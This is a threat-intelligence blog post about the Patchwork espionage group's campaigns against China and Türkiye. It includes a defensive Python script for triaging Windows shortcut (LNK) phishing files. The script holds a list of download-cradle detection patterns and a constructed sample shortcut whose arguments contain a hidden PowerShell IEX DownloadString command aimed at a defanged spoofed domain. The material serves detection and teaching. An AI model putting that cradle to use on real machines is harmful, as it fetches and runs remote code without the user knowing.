The cyber-espionage group known as Patchwork (aka Dropping Elephant) is stepping up its game — both in tactical sophistication and geographic reach — with recent operations spanning China and, for the first time, Türkiye, a global player in unmanned aerial vehicle (UAV) exports and hypersonic missile development.
In the China-focused campaign, the group deployed a Rust-based loader that decrypts and launches Protego, a C#-based information-stealing trojan that siphons data from infected Windows systems. The lure was decoy content referencing China's power grid, critical infrastructure of obvious national interest.
A separate recent campaign against Türkiye shows Patchwork's growing ambition and operational range. Phishing emails carried malicious Windows shortcut (LNK) files that kicked off a multi-stage infection chain: the shortcuts ran PowerShell commands that retrieved further payloads from a spoofed domain, expouav[.]org, built to impersonate a legitimate international UAV conference site and dupe targets.
Once launched, the chain ran in the background and gave the operators reconnaissance capabilities, including screenshot capture and exfiltration of system data, with nothing visible to the user.
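The first link in that chain, a shortcut file that launches a PowerShell download cradle, is also the easiest place to catch it. The script below is an added example, not code from the original post or from the researchers it cites: it parses the parts of the MS-SHLLINK format needed to recover a shortcut's target and command-line arguments, then flags the indicators a triage analyst looks for (PowerShell, hidden window, execution-policy bypass, encoded command, a download or IEX, an embedded URL). The sample shortcut is constructed in memory; the domain is written defanged as in the post and the path under it is a hypothetical placeholder.

```python
"""Triage helper for Windows shortcut (.lnk) phishing lures.

Added example, not code from the post or the cited research.  Parses the
MS-SHLLINK header and StringData fields, then flags PowerShell download
cradle indicators such as the one described for the Türkiye lure.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Indicators typical of a shortcut that launches a PowerShell download cradle.
SUSPICIOUS = [
    (r"powershell|pwsh", "launches PowerShell"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-e(xecutionpolicy|p)\s+bypass", "execution policy bypass"),
    (r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b",
     "downloads content"),
    (r"\biex\b|invoke-expression", "executes downloaded content"),
    (r"https?://", "embedded URL"),
]


def parse_lnk(data: bytes) -> dict:
    """Return the LinkFlags and StringData fields of a shell link file."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    # Skip LinkTargetIDList (2-byte size + list) and LinkInfo (4-byte size
    # that includes itself); only the StringData that follows is needed here.
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters
            pos += 2
            nbytes = count * 2 if unicode else count
            fields[name] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
            pos += nbytes
    return {"flags": flags, **fields}


def triage_lnk(data: bytes) -> dict:
    """Score a shortcut on the download-cradle indicators above."""
    info = parse_lnk(data)
    cmdline = " ".join(info.get(k, "") for k in ("relative_path", "arguments"))
    hits = [label for pattern, label in SUSPICIOUS
            if re.search(pattern, cmdline, re.IGNORECASE)]
    urls = re.findall(r"https?://[^\s'\"()]+", cmdline)
    return {
        "target": info.get("relative_path"),
        "arguments": info.get("arguments"),
        "indicators": hits,
        "urls": urls,
        # PowerShell plus at least two more indicators is worth an analyst's time.
        "suspicious": "launches PowerShell" in hits and len(hits) >= 3,
    }


def build_lnk(relative_path: str, arguments: str = "") -> bytes:
    """Build a minimal Unicode shortcut (header + RelativePath + Arguments).
    Used only to construct samples; real lures also carry an IDList,
    LinkInfo and ExtraData and are much larger."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + (string_data(arguments) if arguments else b"")


# Constructed sample modelled on the post's description of the Türkiye lure:
# hidden PowerShell fetching the next stage from the spoofed conference domain.
# The domain is defanged as in the post; the path under it is a placeholder.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -ep bypass -c \"IEX((New-Object Net.WebClient)"
    ".DownloadString('https://expouav[.]org/placeholder'))\"",
)
# Constructed benign shortcut, to show the scoring does not fire on everything.
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe")

if __name__ == "__main__":
    for name, blob in (("sample lure", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        print(name, triage_lnk(blob))
```

Run it over a directory of quarantined attachments and the `indicators` list tells you why a file scored; the `urls` list is what goes straight to your blocklist. Attackers often pad the argument string with whitespace so the payload sits past what Explorer's Properties dialog displays, which is one reason to parse the file rather than trust the UI.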
The tooling has evolved too. Patchwork has moved from the x64 DLL variants seen previously to more lightweight x86 PE executables (EXE rather than DLL), which points to architectural adaptability and growing command-and-control (C2) sophistication. The new infrastructure imitates legitimate websites to blend in and avoid detection.
Separately, researchers at QiAnXin earlier this year found infrastructure overlaps between Patchwork and the DoNot Team (aka APT-Q-38 or Bellyworm), hinting at collaboration or shared tooling between the two APT groups.
Final Thoughts
Patchwork is no longer just a regional nuisance. It is a highly adaptive cyber-espionage actor that combines deception, stealth, and evolving malware architectures to target geopolitical rivals, while staying ahead of traditional detection methods.
Best practices to beat threat actors like Patchwork?
Stay alert. Carry out periodic vulnerability assessments. Conduct regular cyber awareness training for team members on phishing and other social engineering tactics. Given the chain described above, also treat shortcut (LNK) attachments as executable content and block or quarantine them at the mail gateway, alert on PowerShell launched from a shortcut with a hidden window or a download command, and watch outbound traffic for lookalike domains of the kind used to impersonate the UAV conference site.
Loved this? Subscribe to the Cyberkach blog for more.